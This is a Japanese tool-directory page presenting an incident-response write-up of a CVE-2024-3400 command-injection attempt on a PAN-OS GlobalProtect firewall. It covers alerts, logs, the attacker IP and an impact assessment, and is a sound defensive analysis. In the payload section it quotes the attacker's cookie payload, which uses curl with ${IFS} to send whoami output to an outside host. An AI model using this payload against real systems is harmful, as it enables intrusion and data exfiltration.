Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PAN-OS-CVE-2024-3400-Command-Injection-Investigation — PAN-OS CVE-2024-3400 コマンドインジェクション試行の調査、ペイロード配信、内部処理、およびログ証拠に基づく実行検証の分析。 | Kitploit
ツール/GitHubGitHub/zedocun/pan-os-cve-2024-3400-command-injection-investigation
脆弱性分析ウェブセキュリティデジタルフォレンジック脅威インテリジェンスインシデントレスポンスログ分析
GitHubzedocun/pan-os-cve-2024-3400-command-injection-investigation

PAN-OS-CVE-2024-3400-Command-Injection-Investigation

PAN-OS CVE-2024-3400 コマンドインジェクション試行の調査、ペイロード配信、内部処理、およびログ証拠に基づく実行検証の分析。

リポジトリを見る
124ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Read on Medium

PAN-OS CVE-2024-3400 コマンドインジェクション試行の調査

概要

本プロジェクトでは、PAN-OS GlobalProtect サービスを標的とした CVE-2024-3400 のコマンドインジェクション試行 の調査について記録しています。

目的は以下の判断です:

  • 実際の攻撃であるかどうか
  • コマンド実行が発生したかどうか
  • 侵害の痕跡がないかどうか

アラート概要

重大なアラートがトリガーされ、悪用試行の可能性が示されました。

  • ターゲット:172.16.17.139 (PA-Firewall-01)
  • 送信元:144.172.79.92
  • エンドポイント:/global-protect/login.esp
  • メソッド:POST
  • アクション:許可

アラート概要


悪意のあるペイロード

リクエストには細工されたクッキーが含まれています:

SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

ペイロード

主な観察事項

  • ${IFS} でスペースフィルターをバイパス
  • whoami でシステムの識別情報を取得しようとする
  • curl で外部通信を試行する

これは コマンドインジェクションペイロード です


Webサーバーの証拠

Nginx ログでリクエストがサーバーに到達したことが確認されました:

POST /global-protect/login.esp
HTTP 200
User-Agent: curl

Nginx ログ

悪意のあるリクエストは受け入れられ、処理されました。


内部処理

システムログには、ペイロードが内部ロジックに到達したことが示されています:

処理ログ

重要な発見

  • ペイロードは内部コマンド (dt_curl) に埋め込まれた
  • 外部リクエストが試行された
  • 実行チェーンが内部コンポーネントに到達した

しかし:

DNS ルックアップが失敗 → 外部への送信は失敗


攻撃者のインフラ

攻撃元 IP:

  • 144.172.79.92
  • 悪意ありとフラグ付け
  • ホスティングプロバイダと関連

攻撃元 IP

これにより外部攻撃者からの発信が確認されました。


ネットワークタイムライン

攻撃前に複数の IP がシステムとやり取りしていました:

タイムライン

実際にエクスプロイトに関連しているのは 144.172.79.92 のみです。


影響評価

確認済み

  • CVE-2024-3400 を狙った悪用試行
  • 悪意のあるペイロードの配信
  • サーバーによるリクエスト処理
  • ペイロードが内部処理に到達
  • 外部への送信試行がトリガーされた

未確認

  • OS コマンドの実行
  • コマンドの出力
  • データ流出
  • リバースシェル
  • 永続化
  • 横移動

結論

これは 実際のコマンドインジェクション試行 でした。

攻撃者は以下のことに成功しました:

  • 悪意のあるリクエストの送信
  • ペイロードの注入
  • 内部処理のトリガー

しかし:

確認された実行やシステム侵害はありません


最終分類

コマンドインジェクション試行
ペイロード処理済み — 実行・影響は確認されず

ツールをダウンロード